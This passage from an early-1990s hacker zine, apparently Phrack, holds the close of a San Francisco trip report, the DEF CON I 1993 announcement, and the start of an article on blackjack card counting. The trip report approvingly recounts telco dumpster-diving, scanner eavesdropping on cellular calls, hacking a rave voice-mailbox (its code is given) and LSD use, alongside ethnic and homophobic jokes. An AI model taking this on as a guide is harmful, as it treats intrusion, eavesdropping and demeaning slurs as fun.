to go. It was like the Warner Bros. cartoon of the big dog and the little dog "huh Spike, we gonna get us a cat, aren't we Spike, yep, we are gonna get that cat, boy, aren't we Spike, yep, yep, boy I can't wait, boy is that darn cat gonna be sorry, isn't he Spike, huh, Spike, huh?" Fitzgerald was psyched. Driving through downtown San Francisco was kind of like some kind of deranged Nientendo game. The streets were obviously layed out by farm animals. Traffic was disgusting. Of course, 3:30 on Friday afternoon is official road construction time in downtown San Francisco. That was not in my "Welcome To SF" guide, so I penciled it in. About 4:00 we found an open lot, amazingly enough across from the Pac Bell building. We paid roughly 37 thousand dollars for the spot and took off to the museum. Fitzgerald was in heaven. He had called the museum from the hotel before we left and told them we were on our way. Upon walking in the building we were stopped by a guard. He asked us what we wanted. Fitzgerald said, "We're here for to see the museum!" The guard gave us the once over and said, "Museum's closed." Fitzgerald almost fainted. Sure enough, the museum guy had bailed early. Probably immediately after receiving our phone call. Typical telco nazi antics. We took to the streets. (The streets of San Francisco...haha) Wandering up and down the hills checking people out proved quite fun. We checked out Chinatown where we all decided that the little Oriental schoolgirls in their uniforms were quite amazing. We tried to spot the opium dens, and pointed out suspect organized crime figures. Suddenly, we realized we were lost, and if we didn't get back to the lot we would lose our car. (Thirty-seven thousand dollars only buys you a spot for a few hours.) We managed to find our car minutes before the tow trucks rolled in and spent a few more hours looking for buildings with good dumpsters for that night's planned trashing spree. We found a few spots and took off towards the hotel and dinner. 12. Zen & The Art of Trashing That night everyone decided to move into our room. Somehow Fitzgerald stole a bed and wheeled it into our room to allow for more sleep space. So, it was X-con, Fitzgerald, me, Fender and Mr. Blast all smashed into the little room. As we were sitting in the room discussing what to do that evening, the door burst open and a large man in basketball sweats walked in. After he saw us in the room he turned around and quickly exited. Fitzgerald ran out in the hall after him and discovered that the whole hall was full of basketball players. We called down to the front desk to complain that our room had been given out. The desk apologized and told us that the mistake had been noticed and they would correct the problem with the basketball team. This did not exactly sit well with me, as I envisioned shitloads of jocks rooting through our stuff, taking my camera and various and sundry electronics gear. Temporarily forgetting about the impending robberies, we took off to do a little recon of our own. The five of us and The Pilot piled into two cars and took off towards downtown looking for garbage. We found several Pac Bell offices but the only one with any type of dumpster had nothing to offer save old yellow pages and pizza boxes. We were totally bummed. We decided to wander around aimlessly to see what we could stumble across. After making about a dozen turns and walking a mile or two we came across a huge black beast of a building. It looked like the Borg Cube. It was vast and foreboding. It was an AT&T building. Fitzgerald took off towards the door to ask for a tour. It was only 11:00 in the evening, so we were certain that we would be given a hearty welcoming and guided journey through the bowels of the cube. Yeah, right. Alas, we were not to be assimilated. The guard told us to get lost. We decided to see the Borg used dumpsters. Around the back end of the building by the loading docks we saw several stair landings starting about three floors up. We debated scaling the building, but noticed about 500 security cameras. This place was possibly the most secure telco installation we had ever seen. We decided that this place must be the point of presence for the West Coast since it was just so damn impenetrable. As we turned to leave I noticed a small piece of white cord on the ground. As I picked it up, we noticed it led from a small construction shack behind the POP. It ran all the way from the shack to a heavy steel door in the side of the cube where it snaked its way under the door into the building and probably into the frame. We all had a great laugh at the exposed line, and wished we would have had a test-set to make a few choice overseas calls. We wandered back to the cars and ended up driving around downtown some more for a few hours before ending up back at the hotel. 13. Mr. Blast Can't Drive. We all regrouped the next morning to go shopping downtown. Fender was kind enough to dish out vast quantities of chocolate-covered espresso beans and we all got completely wired. X-con and I decided that we should have had a bag of these the previous morning. We drove straight down to Chinatown and began looking for a place to park. Mr. Blast, Fender, X-con were in one car, me, Fitzgerald and The Pilot in another. Mr. Blast, for being from a huge city, had absolutely no concept of driving in traffic in a downtown setting. He missed lots, made weird turns, ran lights and generally seemed like he was trying to lose us. He achieved his desired goal. We cursed his name for fifteen minutes and then gave up our search. Fitzgerald had swiped Fender's scanner and was busily entertaining himself listening to cellular phone calls. He had the window rolled down in the back seat and took great joy in holding up the scanner so people walking down the street could join in on the voyeuristic fun. Suddenly Fitzgerald shouted, "HOLY SHIT! I can't believe it!" The Pilot and I nearly had matching strokes, "WHAT?" I said. "It's ENCRYPTED! I can't believe it man, encrypted speech on the phone!" I began to laugh, and The Pilot soon joined in. It was Mandarin. "Where the hell are we, Fitz?" I asked him. "San Francisco, " he replied. "No," I said, "Specifically, where in San Francisco?" Fitzgerald thought for a minute and said, "Uh, Chinatown?" Suddenly, his eyes lit up, "OHHHHHHH. Hehe.. it's not encrypted is it?" We laughed at him for about ten minutes. We came to a stop light where a very confused Chinese lady was looking at us. Fitzgerald held up the scanner and I yelled, "Herro!" We went hysterical as we drove off, leaving the woman even more bewildered. We found a place to park and decided to explore on our own. The plethora of little Chinese hotties blew my mind. We staggered around Chinatown trying to get bargains on electronics gear. It struck us all as odd that every electronics store in the downtown area was owned and operated by Iranians. Needless to say, no bargains were found. We had lunch at a restaurant called Red Dragon. The majority of the lunch was spent talking telco. Watching Fitz and The Pilot get totally wrapped up in the talk, both trying to tell the best story about the neatest hack proved incredibly interesting. We took off into the crowds to try to find cheap watches, since The Pilot's watch was ready to retire. He soon made a totally sweet deal on a watch from an oriental merchant and we took off for the car. On the way we noticed a small shop in a back alley with throwing stars in the window. Inside was ninja heaven. They had daggers, cloaks, stars, nunchaca, swords, masks and tons and tons of violence inducing paraphanalia. I saw a telescoping steel whip behind a case. I knew I must possess this item, and when I found out that it was only $22.00 the money was already in my hands. Fitz also got a whip and five stars. We were now armed...Phiber beware. We took off down to the port to look out at the bay. While we were there we watched a bunch of skaters doing totally insane street style in a small cement fountain area. One kid waxed the street with his face and we all had a serious laugh, much to the chagrin of the injured and his posse. As soon as they scraped up the hapless skatepunk off the ground, they resumed their thrashing, avoiding the wet spot. We decided that these kids were totally insane. We took off back to the hotel to meet up with the idiots. Once we arrived we found that we were locked out of our room. In fact, not only had they cut off our keys, but they had checked us out. We got a security guard to let us in the room. Shortly thereafter X-con et.al. returned loaded with gear they had picked up on their trip. They exclaimed that they rushed back to the hotel at top speed, since when they tried to call the room, the hotel had said that our room was not in use. I got furious and went downstairs to yell. Eventually, we got our phone service back and the manager went upstairs to give us a live body to verbally abuse, which we took full advantage of. He shucked and jived his way through an apology but we did not get a free night as we had hoped for. 14. Castro-Bound X-Con wanted shoes. We all sorted out the card key mess and piled back in The Pilot's car and headed out to find NaNa's. As we drove towards the store we noticed something change about the city. The fog lifted. The colors got more pastel. The men walking down the street seemed to have more spring in their step. We had entered the Castro. I really wanted to hit a record store in the Castro because homos always seem to have cool dance music. I convinced everyone that we should pull over and risk a quick walk down the main drag. The stroll was a complete farce. Our crew seemed to be extremely apprehensive. To make them more edgy I took great glee in talking real nelly and batting my eyes at anything that moved. No one was amused. In fact, Fitzgerald and the Pilot looked like they wanted to cry and run back to the car and hide. None of the record stores had anything good. There were lots of old Judy Garland and Ethyl Merman but nothing more modern than the Village People. (And I was expecting techno. But noooooo...) On our way back to the car we passed by a leather goods store. Not exactly Tandycraft, if you get my drift. X-con was the only one brave enough to go in. He came out looking drained of all color holding a catalog. "There were these three guys in there," he stammered. "One of them was being fitted for a cock sheath. The two other guys kept showing him different ones, but he said they were too big." We all shuddered and hastened our return to the car. We drove a few miles more down the street and ended up at the NaNa's shop. The store was your typical alternative grunge-wear shop. Stompin' boots, nifty caps, shirts by Blunt. X-con got his shoes. We all got nifty caps. Leaving for the hotel, I grabbed a handful of flyers from the front window. Most were rave flyers for the next weekend. One however was announcing a bondage party for 'women only' two days later. I felt a tear begin to form as I reminisced about the Bridge. 15. Hating It In The Height. We regrouped back at the hotel and took off again for the Height to go check out Rough Trade records and see what could be seen. And X-con and I needed a few tabs. (YEEE!) We needed these rather badly since Mr. Blast had found out about a rave that evening from the SF-RAVES mailing list. There was no way X-con and I could sit through a rave sober, and dancing was WAY out of the question. Rough Trade was closed. We decided to grab a quick bite to eat while waiting for information on the rave. We decided to try something really odd, since we weren't in for the typical corporate burger scene. A bit down the street from Rough Trade we happened upon a Ethopian restaurant. Since this was about as obscure as any of us had ever dreamed, we decided to check it out. I personally didn't think Ethopians ever had any food, and made a few jokes about wanting something light, so this would definitely be the place. Ethopian food was odd. Looking over the menu, Mr. Blast decided that he didn't want much of anything they had to offer. We decided that we should buy a lot of everything and just pick and choose. I made the comment that I would only eat chicken, and Mr. Blast didn't like the idea of eating much of anything everyone wanted to try. We ordered separately. The food came out in a rather odd fashion. Everything was piled on top of everything else. It was all splattered on top of a weird pancake-like sponge bread. There were all manner of sauces to smother, dip, or otherwise destroy the entrees with, so we all took great bravado in our sampling of each. It was quite a fantastic spread, and I wholeheartedly urge everyone to check out this particular cuisine. After the meal we took off to find a phone to call the raveline. On our way to the phone X-con and I stumbled across a few transients who offered us acid at a remarkable price. This was almost too good to be true. We slunk down a side street and bs'ed with the homeless couple as we decided how many to buy. We settled on 20 hits for 45 dollars. X-con and I were psyched. The rave would indeed be tolerable. We hooked up with the crew, smiling like Cheshire cats. Mr. Blast had the directions to the rave so we took off ready to overindulge. By the time we reached the rave, we were one of what seemed like a hundred or two hanging outside of a warehouse. This might be pretty damn cool. X-con and I began our dosing. Now, usually I love the first contact of the blotter with my tongue. It evokes a certain tangy taste, akin to touching a battery to the tip of your tongue. It always gets the adrenaline flowing, and brings back memories of what will soon be repeated. Nothing. I looked at X-con. "Dude," he said, "I can't taste shit. I better take more." He dropped about 3 more. Still no taste. I ate a few more myself in a futile hope that some lysergine substance may have once resided in the fibers of the blotter. Nope. This was the beginning. As we waited to be let in to the warehouse, cursing the transients, the sirens begin to wail. Fucking great. Five police cars swept into the cul-de-sac that led to the warehouse. The rave would not be in this location. Everyone bailed like rats from a sinking ship, yelling that the rave would be moved to a soon to be announced location. Now X-con and I were really pissed. I whipped out my steel whip and said, "Let's go pay a quick visit to the Height and visit our friends." We piled back into the cars and set out to do some serious damage. Arriving in the Height we noticed that cops were everywhere. This was not going to be easy. X-con and I set out like men possessed. The transients were gone. We wandered up and down the street for about 30 minutes looking for our prey. Finally we saw them. They saw us. One ran like a marathon sprinter. The other stayed, but was soon flanked by a gang of eight other transients. X-con walked right up and said "You fucking ripped us off!" As we tried to get either our money back or working drugs, more and more transients gathered. It was time to write it off as a loss. We cursed and backed away from the crowd. Our group had congregated at a grocery store at the end of the street. Mr. Blast was speed dialing the raveline in a desperate attempt to find a venue to spin wildly in and blow his day-glo rave whistle. Across the street, a homeless black man screamed painfully at each and every passing car, "HELP! You gotta take me and my girlfriend to the hospital now! She's gonna DIE!" He staggered over to us and begged for a ride, we respectfully declined. As this was going on, the grocery store erupted with violence as a drunken frat type was ejected forcibly. He started swinging wildly at the rent-a-cop, and was greeted with the business end of a police baton. The Pilot decided this was a good time to make his exit. He waved goodbye and was gone. RBOC, Voxman and a nameless waif arrived in the parking lot. We told them the status of the rave and they decided to wait to see if there may be any type of decadence forthcoming. About that time Mr. Blast came screaming across the lot with the directions. We no longer had room for everyone, so Voxman & the nameless waif were offered a ride from a flaming pedophile who overheard their plight. The took him up on his offer before we could stop them. We said a quick prayer for them and piled into the car. 16. Stark Raving Mad Late Into The Night The new location was out at a marina in Berkeley on the beach. It took damn near an enternity to get there and when we arrived it was raining. X-con and I made it our mission to find acid at this location. The music could be heard for several hundred yards from the street, so we took off in a sprint towards the source. There were roughly 40 or so people. Thirty-nine guys, one ugly girl. X-con immediately disappeared in the crowd looking for someone with a beeper...anyone. Fender disappeared. Fitz disappeared. RBOC and I sat and made rude comments. X-con arrived back with a big smile. Our saviour was in the form of a teenage Hispanic dude. He had red blotter with elephant, and yellow blotter with some other kind of design. The yellow was "three-way." We bought several of each, and there was much rejoicing. X-con had already eaten one three-way and one regular, before I could split one in half for RBOC. The taste was overwhelming. Freshly squeezed. The three of us perched up on a hill staring out over the undulating mass waiting for the effect. It came quickly. As it hit, Fitz wandered up and said, "Let's hack the raveline!" This idea went over VERY WELL, so we all set out towards the car, leaving little sparky streamers behind us as we moved. From a nearby hotel lobby, Fitz and X-con busily hacked at the VMB while RBOC and I sat in the car totally wigging. About 30 minutes later they ran out screaming. It had been done and the code was now 902100. We drove back to the rave and noticed the red and blues flashing and the ravers bailing en masse. We picked up Mr. Blast and Fender and took off back to our hotel. Fender had done a bit of networking at the rave and exchanged a few business cards. We were totally appalled. Once back at the hotel X-con took even more. He said he wanted to see static. Within an hour he achieved his goal. He spent a large portion of the night walking in and out of the room muttering, "Man...you guys are totally fucking with me." We then decided to spice up the raveline. RBOC changed the outgoing message a few times and then finally decided on, "HAR HAR HAR, Y'all been boarded by the pirate! No more techno! No more homosexuals grinding away at 120 beats per minute! No more Rave! HAR HAR HAR!" We laughed like schoolgirls. Everyone passed out. Everyone but us tripsters of course. We stayed up the majority of the night telling really odd pharmaceutical war stories. At about 6 am RBOC decided that he was hungry and called for room service. He ordered linguini. The room service clerk told him that the kitchen was not ready for dinner, and would only be serving breakfast. RBOC replied, "Look, do you have noodles? Yes? Do you have water? Well, what's the fucking problem. What exactly do you need to boil water? Turn on the stove, and I'll be down in a few minutes to make it myself." With this logic, the room service clerk replied his linguini would be up in about half an hour. We then decided to get escorts, or at least order up a few, and listen to them on their cell phones calling their pimps. (Fender had listened to about five different such conversations a few nights prior.) RBOC ordered up a couple of buxom blondes to go and we waited for their return phone call to barter on the price. The call never came in. The hotel had turned off our phone for incoming calls. This sparked even more fun, as RBOC called up the front desk to complain, "Look ma'am, my hookers can't fucking call into my room! Turn my phone back on NOW! I've had a rough night up for 24 hours on drugs, and I need a woman." The operator was not amused. The sun rose. We all remarked about the typical morning after layer of filth that seems to congeal after a good fry. The static was no longer visible to X-con and he became almost lucid again, interjecting bits of wisdom like "Uh" and "Yeah" into the conversation. His flight was in two hours. The linguini arrived and everyone had a small taste as the smell of the white sauce permeated the room. As we smacked away, the inexperienced of the crowd arose to greet a new morning. RBOC suddenly realized that NYC was probably snowed under, so he took off to find a phone to check on the status of his flight home. X-con gathered his bags and mumbled "Later," and disappeared. I fell on the bed and disappeared into darkness. 17. Laterz The alarm clock blared out a sickening beep, to which it was rewarded with a small flight across the hotel room. I gathered up my gear and made a beeline towards the elevator. Still confused, I wandered down to the lobby where I was greeted by Fitzgerald and Fender. I bid them both a fond farewell and boarded the airport shuttle. This was one hell of a good time. I wonder if CFP4 in Chicago will be as good? One can only hope. See you there. *************************************************************************** D E F C O N I C O N V E N T I O N D E F C O N I C O N V E N T I O N DEF CON I CONVENTION D E F C O N I C O N V E N T I O N >> READ AND DISTRIBUTE AND READ AND DISTRIBUTE AND READ AND DISTRIBUTE << Finalized Announcement: 5/08/1993 We are proud to announce the 1st annual Def Con. If you are at all familiar with any of the previous Con's, then you will have a good idea of what DEF CON I will be like. If you don't have any experience with Con's, they are an event on the order of a pilgrimage to Mecca for the underground. They are a mind-blowing orgy of information exchange, viewpoints, speeches, education, enlightenment... And most of all sheer, unchecked PARTYING. It is an event that you must experience at least once in your lifetime. The partying aside, it is a wonderful opportunity to met some of the celebrities of the underground computer scene. And those that shape its destiny - the lawyers, libertarians, and most of all the other There will be plenty of open-ended discussion on security, telephones and other topics. As well as what TIME magazine calls the "Cyberpunk Movement". Las Vegas, is as you might have guessed a great choice for the Con. Gambling, loads of hotels and facilities, cheap air fare and room rates. It's also in the West Coast making it more available to a different crowd than the former Cons have been. Your foray into the scene and your life will be forever incomplete if by some chance you miss out on DEF CON I. Plan to be there! WHO: You know who you are. WHAT: Super Blowout Party Fest, with Speakers and Activities. WHERE: Las Vegas, Nevada WHEN: July 9th, 10th and 11th (Fri, Sat, Sun) 1993 WHY: To meet all the other people out there you've been talking to for months and months, and get some solid information instead of rumors. DESCRIPTION: So your bored, and have never gone to a convention? You want to meet all the other members of the so called 'computer underground'? You've been calling BBS systems for a long time now, and you definitely have been interacting on the national networks. You've bullshitted with the best, and now it's time to meet them in Vegas! For me I've been networking for years, and now I'll get a chance to meet everyone in the flesh. Get together with a group of your friends and make the journey. We cordially invite all hackers/phreaks, techno-rats, programmers, writers, activists, lawyers, philosophers, politicians, security officials, cyberpunks and all network sysops and users to attend. DEF CON I will be over the weekend in the middle of down town Las Vegas at the Sands Hotel. Why Las Vegas? Well the West Coast hasn't had a good Convention that I can remember, and Las Vegas is the place to do it. Cheap food, alcohol, lots of entertainment and, like us, it never sleeps. We will have a convention room open 24 hours so everyone can meet and plan and scheme till they pass out. Events and speakers will be there to provide distraction and some actual information and experiences from this loosely knit community. This is an initial announcement. It is meant only to alert you to the time, dates and location of the convention. Future announcements will inform you about specific speakers and events. An information pack is FTPable off of the internet at nwnexus.wa.com, in the cd/pub/dtangent directory. The IP# is 192.135.191.1 Information updates will be posted there in the future as well as scanned map images and updated speaker lists. FINAL NOTES: COST: How you get there is up to you, but United Airlines will be the official carrier (meaning if you fly you get a 5% to 10% price reduction off the cheapest available fare at the time of ticket purchase) When buying airline tickets, call 1-800-521-4041 and reference meeting ID# 540ii. Hotel Rooms will cost $62 per night for a double occupancy room. Get your friends together and split the cost to $31. Food is inexpensive. The entertainment is free inside the hotel. Reference the DEF CON I convention when registering, as we have a block of rooms locked out, but once they go it will be first come, fist serve. Call 1-800-634-6901 for the reservations desk. The convention itself will cost $30 at the door, or $15 in advance. It pays to register in advance! Also it helps us plan and cover expenses! Mail checks/money orders/cashiers checks to: DEF CON I, 2709 East Madison Street, #102, Seattle, WA, 98112. Make them payable to: "DEF CON" we're not trying to make money, we will be trying to cover costs of the conference room and hotel plus air fair for the speakers who require it. Don't bother mailing it a week in advance, that just won't happen. Advanced registration gets you a groovy 24 bit color pre-generated name tag. Include with your payment the name you want listed, your association/group affiliation/bbs/whatever, email address, and/or bbs number for syops. Last day for the registrations to reach me will be July 1st. SPEAKERS: We have solicited speakers from all aspects of the computer underground and associated culture (Law, Media, Software Companies, Cracking Groups, Hacking Groups, Magazine Editors, Etc.) If you know of someone interested in speaking on a self selected topic, please contact The Dark Tangent to discuss it. FOR MORE INFORMATION: For initial comments, requests for more information, information about speaking at the event, or maps to the section where prostitution is legal outside Las Vegas (Just Kidding) Contact The Dark Tangent by leaving me mail at: dtangent@dtangent.wa.com on the InterNet. Or call: 0-700-TANGENT for conference information/updates and to leave questions or comments. Or Snail Mail (U.S. Postal Service) it to DEF CON, 2709 East Madison Street, #102, Seattle, WA, 98112. Future information updates will pertain to the speaking agenda. ------------------------------------------------------------------------------ Updates since the last announcement: >> The Secret Service is too busy to attend. >> New Media Magazine, Unix World and Robert X. Cringly have stated they will attend. >> We got a voice mail system working (I think) for comments and questions. >> We don't have enough $$$ to fly out the EFF or Phillip Zimmerman (Author of PGP) or Loyd Blankenship. >> Judy Clark will be representing the CPSR and a few other organizations Don't forget to bring a poster / banner representing any of the groups you belong to. I want to cover the conference room walls with a display of all the various groups / people attending. (Break out the crayons and markers) ------------------------------------------------------------------------------ DEF CON I CONVENTION [PROPOSED SPEAKING SCHEDULE UPDATED 5.31.1993] Saturday the 10th of July 10am, Sands Hotel, Las Vegas INTRODUCTION Welcome to the convention *The Dark Tangent (CON Organizer) Keynote speaker Cyberspace, Society, crime and the future. To hack or not to hack, that is not the question *Ray Kaplan Civil Libertarians -CPSR Computer Privacy/1st Amendment/Encryption Gender Rolls and Discrimination *Judi Clark -USC Comp. Law Legalities of BBS Operation, message content laws and network concerns. *Allen Grogan, Editor of Computer Lawyer 'The Underworld' -Networking Concerns of National Networking of CCi (Cyber Crime International) Network. *Midnight Sorrow. Corporations -Packet Switching SPRINT Concerns/security and the future MCI of packet switching. (*Jim Black, MCI Systems Integrity) Misc Common misbeliefs and rumors of the underground *Scott Simpson -Virtual Reality The law, and it's intersection with VR *Karnow -Unix Security Future developments in unix security software, General Q&A on unix security *Dan Farmer -System Administrator Security Concerns of an Administrator *Terminus The 'Underworld' -Internet The security problems with Internet/Networks Overview of hacking *Dark Druid -Getting Busted The process of getting "busted" *Count Zero -How to be a nobody Hiding your identity in the high-tech future, or The payphone is your friend. *TBA-nonymous -The Prosecutors Their concerns/problems and Hacker Hunters suggestions for the 'underworld'/Q&A CONCLUSION General Q&A This itinerary is proposed, and topics and speakers will be marked as permanent once a confirmation is received. This is by no means the exact format of DEF CON I. Any Questions / Comments Contact: dtangent@dtangent.wa.com Voice Mail 0-700-TANGENT ------------------------------------------------------------------------------ [> DEF CON I and United Airlines Travel Arrangements <] United Airlines has been chosen as the official carrier for DEF CON I and is pleased to offer a 10% discount off the unrestricted BUA coach fare or a 5% discount off the lowest applicable fares, including first class. This special offer is available only to attendees of this meeting, and applies to travel on domestic segments of all United Airlines and United Express flights. A 5% discount off any fare is also available for attendees traveling to or from Canada in conjunction with your meeting. These fares are available through United's Meeting Desk with all fare rules and restrictions applying. Help support the DEF CON I Conference by securing your reservations with United Airlines. To obtain the best fares or schedule information, please call United's Specialized Meeting Reservations Center at 1-800-521-4041. Dedicated reservationists are on duty 7 days a week from 7:00 a.m. to 1:00 a.m. ET. Please be sure to reference ID number 540II. You or your travel agent should call today as seats may be limited. As a United Meeting attendee you qualify for special discount rates on Hertz rental cars. Mileage Plus members receive full credit for all miles flown to this meeting. Tickets will be mailed by United or you can pick them up at your local travel agency or United Airlines ticket office. Generic update #1--- My system exploded, so it's been hard to keep in touch with everyone, but my mail response should be better now. Yep the conference is still on. A blown hard drive won't kill me. You can reach me for information or questions at 0-700-TANGENT (the DEF CON I hot line) ----- -- Sorry for the huge signature, but I like privacy on sensitive matters. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.2 mQCNAiviMB8AAAEEANO4XmnggG8h8XWtfxShMvRUarlpj2OBSPMrzUNRAKEjupUj f/FfszMk0G60GSiCfiosw/m2JcKPQ6OZgQCxfElFUcYkKx/rYjgU3viEmNasjAwN jR/9l0WSXlv4CjCUtH/t4rm1C1bs8i6iznmu/dCeuUEZQoRm0Lrdt/10TGt3AAUT tCtUaGUgRGFyayBUYW5nZW50IDxkdGFuZ2VudEBkdGFuZ2VudC53YS5jb20+ =DxKN -----END PGP PUBLIC KEY BLOCK----- ==Phrack Magazine== Volume Four, Issue Forty-Three, File 9 of 27 How to "Hack" BlackJack By Lex Luthor and The Legion of Gamblerz!! (LOG) lex@mindvox.phantom.com (or) lex@stormking.com Part 1 of 2 (50K) BLURB: "I learned a lot of things I didn't know from Lex's File" ---Bruce Sterling Introduction: ------------- With the DEF CON 1 hacker/cyberpunk/law enforcement/security/etc convention coming up in Las Vegas, Nevada on July 9-12 1993, I felt that now would be a good time to write a "phile" on something the attendants could put to use to help legally defray the costs of going. The thought of a bunch of ex-hackers running around Las Vegas without shirts (having 'lost' them in the various Casinos) frightened me into immediate action. Besides, I don't write articles on 'Underground' topics anymore and since I have done a lot of research and playing of Casino BlackJack, the CON in Vegas provided me the perfect excuse to finally write an article for PHRACK (not withstanding the pro-phile in Issue 40 which doesn't really count). Regardless of whether you go to this DEF CON 1 thing, if you ever plan to hit a casino with the purpose of MAKING MONEY, then you really should concentrate on ONE game of chance: BlackJack. Why? Because BlackJack is the *ONLY* casino game that affords the educated and skilled player a long-term mathematical advantage over the house. All the other casino games: Craps, Roulette, Slots, etc. have the long-term mathematical advantage over the player (see table below). BlackJack is also the only casino game for which the odds are always changing. Don't be fooled by all the glitter, a casino is a business and must make a profit to survive. The profit is ensured by using a set of rules which provides them with an edge. Now you say: wait a sec, how do they make money if BlackJack can be beaten? There are a couple of reasons. One reason is that there are very few good players who make it their profession to beat casinos at BlackJack day in and day out. There are many more who THINK they are good, THINK they know how to play the game, and lose more money than the really good players win. Notwithstanding the throngs of vacationers who admit to not being well versed in the game and consequently are doomed to lose...plenty. Another reason is that if a casino thinks you are a "counter" (a term just as nasty as "phreaker" to the phone company) there is a good chance that they will ask you to leave. See the section on Social Engineering the Casino to avoid being spotted as a counter. Also, the house secures its advantage in BlackJack from the fact that the player has to act first. If you bust, the dealer wins your bet regardless of whether the dealer busts later. The following table illustrates my point regarding house advantages for the various casino games and BlackJack strategies. The data is available in most books on casino gambling. Note that negative percentages denote player disadvantages and are therefore house advantages. -------------------------------------------------------------------------- GAME Your Advantage (over the long run) -------------------------------------------------------------------------- Craps -1.4 % overall average Baccarat -1.1 % to -5.0 % Roulette -2.7 % to -5.26 % Slots -2.5 to -25 % depending on machine setting Keno -25 % more or less BlackJack (WAG Player) -2 % to -15 % BlackJack (Mirror Dealer) -5.7 % BlackJack (Basic Strategy) -0.2 % to +0.3 % BlackJack (Basic Strategy & Up to +3.1 % depending on card counting Card Counting) system and betting range. A -2 % player advantage (2 percent disadvantage) means that if you play a hundred hands at a dollar each, then ON AVERAGE, you will lose two dollars. Note that the typical "pick three" State Lottery game is a disaster as your advantage is -50 %. If you make 1000 $1 bets, you will lose $500 on average. Some people say that state lotteries are taxation on the stupid... This article contains thirteen sections. It was written in a fairly modular fashion so if there are sections which do not interest you, you may omit them without much loss in continuity however, all the sections are networked to some degree. For the sake of completeness, a fairly comprehensive list of topics has been presented. Due to email file size restrictions, I had to divide this article into two parts. Note that I am NOT a Professional BlackJack player, the definition being someone whose livelihood is derived solely from his/her winnings. I did however, dedicate a summer to gambling 5 evenings a week or so, keeping meticulous records of wins, losses and expenses incurred. I averaged 1-2 nights a week playing BlackJack with the other nights divided among 3 different forms of Pari-Mutual gambling. At the end of the summer I tallied the wins/losses/expenses and am proud to say the result was a positive net earnings. Unfortunately it was instantly apparent that the net money when divided up by the number of weeks gambling was not enough to warrant me to quit school and become a professional gambler. Besides that one summer, I have played BlackJack off and on for 7 years or so. In case you were wondering, no, I have never been a member of GA [Gamblers Anonymous] contrary to what one of those Bell Security "Hit-Lists" circulated many years ago would have you believe. The topics contained herein are: o Historical Background of the BlackJack Card Game o Useful Gambling, Casino, and BlackJack Definitions o Review of BlackJack Rules of Play o Betting, Money Management, and the Psychology of Gambling o Basic Strategy (End of Part 1) o Card Counting (Beginning of Part 2) o Shuffle Tracking o Casino Security and Surveillance o "Social Engineering" the Casino o Casino Cheating and Player Cheating o Some Comments Regarding Computer BlackJack Games for PC's o A VERY Brief Description of Other Casino Games o Selected Bibliography and Reference List Notes: a) I made extensive use of my many books, articles, and magazines on gambling and BlackJack along with actual playing experience. References are denoted by square brackets [REF#] and are listed in the Selected Bibliography and Reference List section. b) It's hard to win at something you don't understand. If you want to win consistently at anything, learn every thing you can about it. BlackJack is no exception. History of BlackJack: --------------------- I provide this historical background information because I find it rather fascinating and it also provides some insight into contemporary rules and play. I think it is worth reading for the sole reason that you might some day use one of the historical tid-bits to answer a question on Jeopardy!#@%! Seriously, the first couple of paragraphs may read a bit like a book report, but bear with it if you can as I did all of the following research specifically for this file. First, a brief history of cards: Playing cards are believed to have been invented in China and/or India sometime around 900 A.D. The Chinese are thought to have originated card games when they began shuffling paper money (another Chinese invention) into various combinations. In China today, the general term for playing cards means "paper tickets". The contemporary 52 card deck used in the U.S. was originally referred to as the "French Pack" (circa 1600's) which was later adopted by the English and subsequently the Americans. The first accounts of gambling were in 2300 B.C. or so, and yes, the Chinese again get the credit. Gambling was very popular in Ancient Greece even though it was illegal and has been a part of the human experience ever since. Today, with the all too common manipulation of language to suit one's own purposes, gambling is no longer a term used by casinos....they prefer to use the word GAMING instead. Just as Post Traumatic Stress Disorder has replaced the term Shell Shock in military jargon. Since this manipulation of language is all the rage these days, why don't we water down the name Computer Hacker and replace it with Misguided Information Junky or someone who is afflicted with a Compulsive Curiosity Disorder? The history of the BlackJack card game itself is still disputed but was probably spawned from other French games such as "chemin de fer and French Ferme", both of which I am completely unfamiliar with. BlackJack originated in French Casino's around 1700 where it was called "vingt-et-un" ("twenty-and- one" in French) and has been played in the U.S. since the 1800's. BlackJack is called Black-Jack because if a player got a Jack of Spades and an Ace of Spades as the first two cards (Spade being the color black of course), the player was additionally remunerated. Gambling was legal out West from the 1850's to 1910 at which time Nevada made it a felony to operate a gambling game. In 1931, Nevada re-legalized casino gambling where BlackJack became one of the primary games of chance offered to gamblers. As some of you may recall, 1978 was the year casino gambling was legalized in Atlantic City, New Jersey. As of 1989, only two states had legalized casino gambling. Since then, about 20 states have a number of small time casinos (compared to Vegas) which have sprouted up in places such as Black Hawk and Cripple Creek Colorado and in river boats on the Mississippi. Also as of this writing, roughly 70 Native American Indian reservations operate or are building casinos, some of which are in New York and Connecticut. In addition to the U.S., some of the countries (there are many) operating casinos are: France, England, Monaco (Monte Carlo of course) and quite a few in the Caribbean islands (Puerto Rico, Bahamas, Aruba, etc.). Now: The first recognized effort to apply mathematics to BlackJack began in 1953 and culminated in 1956 with a published paper [6]. Roger Baldwin et al (see Bibliography) wrote a paper in the Journal of the American Statistical Association titled "The Optimum Strategy in BlackJack". These pioneers used calculators, and probability and statistics theory to substantially reduce the house advantage. Although the title of their paper was 'optimum strategy', it wasn't really the best strategy because they really needed a computer to refine their system. I dug up a copy of their paper from the library, it is ten pages long and fairly mathematical. To give you an idea of its importance, the Baldwin article did for BlackJack playing what the November 1960 issue of The Bell System Technical Journal entitled, "Signalling Systems for Control of Telephone Switching", did for Blue Boxing. To continue with the analogy, one can consider Professor Edward O. Thorp to be the Captain Crunch of BlackJack. Dr. Thorp, then a mathematics teacher, picked up where Baldwin and company left off. In 1962, Thorp refined their basic strategy and developed the first card counting techniques. He published his results in "Beat the Dealer" [3], a book that became so popular that for a week in 1963 it was on the New York Time's best seller list. The book also scared the hell out of the Casino's. Thorp wrote "Beat the Market" in 1967, in which he used mathematics and computer algorithms to find pricing inefficiencies between stocks and related securities. Currently he is using an arbitrage formula to exploit undervalued warrants in the Japanese stock market. The Casinos were so scared after Beat the Dealer, that they even changed the rules of the game to make if more difficult for the players to win. This didn't last long as people protested by not playing the new pseudo-BlackJack. The unfavorable rules resulted in a loss of income for the casinos. Not making money is a sin for a casino, so they quickly reverted back to the original rules. Because Thorp's "Ten-Count" method wasn't easy to master and many people didn't really understand it anyway, the casinos made a bundle from the game's newly gained popularity thanks to Thorp's book and all the media attention it generated. Beat the Dealer is rather difficult to find these days, I picked up a copy at the library recently and checked the card in the back to see how popular 